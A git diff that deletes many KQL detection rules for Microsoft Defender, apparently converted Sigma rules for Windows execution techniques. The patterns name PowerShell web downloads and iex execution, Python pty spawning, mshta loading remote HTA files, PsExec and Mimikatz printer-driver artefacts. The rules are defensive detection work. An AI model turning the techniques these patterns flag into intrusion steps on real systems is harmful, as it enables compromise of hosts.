diff --git a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql b/Execution/PowerShell_Script_Execution_Policy_Enabled.kql
deleted file mode 100644
index 003aa763..00000000
--- a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
-// Date: 2023/10/18
-// Level: low
-// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
-// Tags: attack.execution
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts"
\ No newline at end of file
diff --git a/Execution/PowerShell_Script_Run_in_AppData.kql b/Execution/PowerShell_Script_Run_in_AppData.kql
deleted file mode 100644
index afece119..00000000
--- a/Execution/PowerShell_Script_Run_in_AppData.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/01/09
-// Level: medium
-// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\"))
\ No newline at end of file
diff --git a/Execution/PowerShell_Web_Download.kql b/Execution/PowerShell_Web_Download.kql
deleted file mode 100644
index b25ef740..00000000
--- a/Execution/PowerShell_Web_Download.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/24
-// Level: medium
-// Description: Detects suspicious ways to download files or content using PowerShell
-// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr "
\ No newline at end of file
diff --git a/Execution/PowerShell_as_a_Service_in_Registry.kql b/Execution/PowerShell_as_a_Service_in_Registry.kql
deleted file mode 100644
index db6f8eca..00000000
--- a/Execution/PowerShell_as_a_Service_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020/10/06
-// Level: high
-// Description: Detects that a powershell code is written to the registry as a service.
-// Tags: attack.execution, attack.t1569.002
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services" and RegistryKey endswith "\\ImagePath"
\ No newline at end of file
diff --git a/Execution/Powershell_Inline_Execution_From_A_File.kql b/Execution/Powershell_Inline_Execution_From_A_File.kql
deleted file mode 100644
index b0993719..00000000
--- a/Execution/Powershell_Inline_Execution_From_A_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/25
-// Level: medium
-// Description: Detects inline execution of PowerShell code from a file
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ")
\ No newline at end of file
diff --git a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql b/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql
deleted file mode 100644
index 7dffb2f5..00000000
--- a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis, Florian Roth
-// Date: 2021/07/04
-// Level: critical
-// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
-// Tags: attack.execution, attack.t1204, cve.2021.1675, cve.2021.34527
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer"))
\ No newline at end of file
diff --git a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql
deleted file mode 100644
index 864ecfca..00000000
--- a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 2d36359f..00000000
--- a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create")))
\ No newline at end of file
diff --git a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql b/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql
deleted file mode 100644
index ef5df7d2..00000000
--- a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql b/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql
deleted file mode 100644
index c1db5f78..00000000
--- a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
-// Tags: attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/Execution/PsExec_Service_Execution.kql b/Execution/PsExec_Service_Execution.kql
deleted file mode 100644
index 124c9951..00000000
--- a/Execution/PsExec_Service_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
-// Date: 2017/06/12
-// Level: medium
-// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe"
\ No newline at end of file
diff --git a/Execution/PsExec_Service_File_Creation.kql b/Execution/PsExec_Service_File_Creation.kql
deleted file mode 100644
index 8280b56f..00000000
--- a/Execution/PsExec_Service_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2017/06/12
-// Level: low
-// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith "\\PSEXESVC.exe"
\ No newline at end of file
diff --git a/Execution/Psexec_Execution.kql b/Execution/Psexec_Execution.kql
deleted file mode 100644
index 84b896e7..00000000
--- a/Execution/Psexec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/30
-// Level: medium
-// Description: Detects user accept agreement execution in psexec commandline
-// Tags: attack.execution, attack.t1569, attack.t1021
-DeviceProcessEvents
-| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c"
\ No newline at end of file
diff --git a/Execution/Python_Inline_Command_Execution.kql b/Execution/Python_Inline_Command_Execution.kql
deleted file mode 100644
index 6cd4f03e..00000000
--- a/Execution/Python_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Python") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe")))
\ No newline at end of file
diff --git a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql b/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql
deleted file mode 100644
index 675fc6f5..00000000
--- a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/03
-// Level: high
-// Description: Detects python spawning a pretty tty
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn")
\ No newline at end of file
diff --git a/Execution/Query_Usage_To_Exfil_Data.kql b/Execution/Query_Usage_To_Exfil_Data.kql
deleted file mode 100644
index d4a9d73a..00000000
--- a/Execution/Query_Usage_To_Exfil_Data.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe"
\ No newline at end of file
diff --git a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql b/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql
deleted file mode 100644
index 6ee0ff69..00000000
--- a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/07
-// Level: medium
-// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql b/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql
deleted file mode 100644
index 6b4d33b2..00000000
--- a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/15
-// Level: medium
-// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE")
\ No newline at end of file
diff --git a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
deleted file mode 100644
index e8f1f303..00000000
--- a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/17
-// Level: medium
-// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
-// Tags: attack.defense_evasion, attack.t1574, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/Execution/RemCom_Service_File_Creation.kql b/Execution/RemCom_Service_File_Creation.kql
deleted file mode 100644
index 4564d7da..00000000
--- a/Execution/RemCom_Service_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/04
-// Level: medium
-// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith "\\RemComSvc.exe"
\ No newline at end of file
diff --git a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
deleted file mode 100644
index 23d22f38..00000000
--- a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/08
-// Level: medium
-// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-
-// Tags: attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql
deleted file mode 100644
index 407483d4..00000000
--- a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ali Alwashali
-// Date: 2023/10/10
-// Level: low
-// Description: Detects the execution of a system command via the ScreenConnect RMM service.
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql
deleted file mode 100644
index 868f9720..00000000
--- a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ali Alwashali
-// Date: 2023/10/10
-// Level: low
-// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
-ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<username>\Documents\ConnectWiseControl\Temp\" before execution.
-
-// Tags: attack.execution, attack.t1059.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\"
\ No newline at end of file
diff --git a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql b/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql
deleted file mode 100644
index 723a8b9d..00000000
--- a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects a remote DLL load event via "rundll32.exe".
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql b/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql
deleted file mode 100644
index 952fe894..00000000
--- a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019/09/12
-// Level: medium
-// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
-// Tags: attack.execution, attack.t1059.001, attack.t1021.006
-DeviceProcessEvents
-| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
deleted file mode 100644
index d0784cd7..00000000
--- a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Execution/Renamed_CURL.EXE_Execution.kql b/Execution/Renamed_CURL.EXE_Execution.kql
deleted file mode 100644
index 5fedd523..00000000
--- a/Execution/Renamed_CURL.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/Execution/Renamed_FTP.EXE_Execution.kql b/Execution/Renamed_FTP.EXE_Execution.kql
deleted file mode 100644
index a2a27522..00000000
--- a/Execution/Renamed_FTP.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/Execution/Renamed_Jusched.EXE_Execution.kql b/Execution/Renamed_Jusched.EXE_Execution.kql
deleted file mode 100644
index 059e77e2..00000000
--- a/Execution/Renamed_Jusched.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Swisscom
-// Date: 2019/06/04
-// Level: high
-// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
-// Tags: attack.execution, attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/Execution/Renamed_NirCmd.EXE_Execution.kql b/Execution/Renamed_NirCmd.EXE_Execution.kql
deleted file mode 100644
index fe83139c..00000000
--- a/Execution/Renamed_NirCmd.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/Execution/Renamed_PingCastle_Binary_Execution.kql b/Execution/Renamed_PingCastle_Binary_Execution.kql
deleted file mode 100644
index 98720000..00000000
--- a/Execution/Renamed_PingCastle_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024/01/11
-// Level: high
-// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/Execution/Renamed_PsExec_Service_Execution.kql b/Execution/Renamed_PsExec_Service_Execution.kql
deleted file mode 100644
index 030057ea..00000000
--- a/Execution/Renamed_PsExec_Service_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe"))
\ No newline at end of file
diff --git a/Execution/Ruby_Inline_Command_Execution.kql b/Execution/Ruby_Inline_Command_Execution.kql
deleted file mode 100644
index 29b2f989..00000000
--- a/Execution/Ruby_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe")
\ No newline at end of file
diff --git a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
deleted file mode 100644
index bd9b3783..00000000
--- a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
-// Date: 2020/10/17
-// Level: high
-// Description: Detects PowerShell script execution via input stream redirect
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/Rundll32_Execution_Without_Parameters.kql b/Execution/Rundll32_Execution_Without_Parameters.kql
deleted file mode 100644
index 6fb33be4..00000000
--- a/Execution/Rundll32_Execution_Without_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz, Relativity
-// Date: 2021/01/31
-// Level: high
-// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/Execution/Rundll32_Internet_Connection.kql b/Execution/Rundll32_Internet_Connection.kql
deleted file mode 100644
index 2acd0757..00000000
--- a/Execution/Rundll32_Internet_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
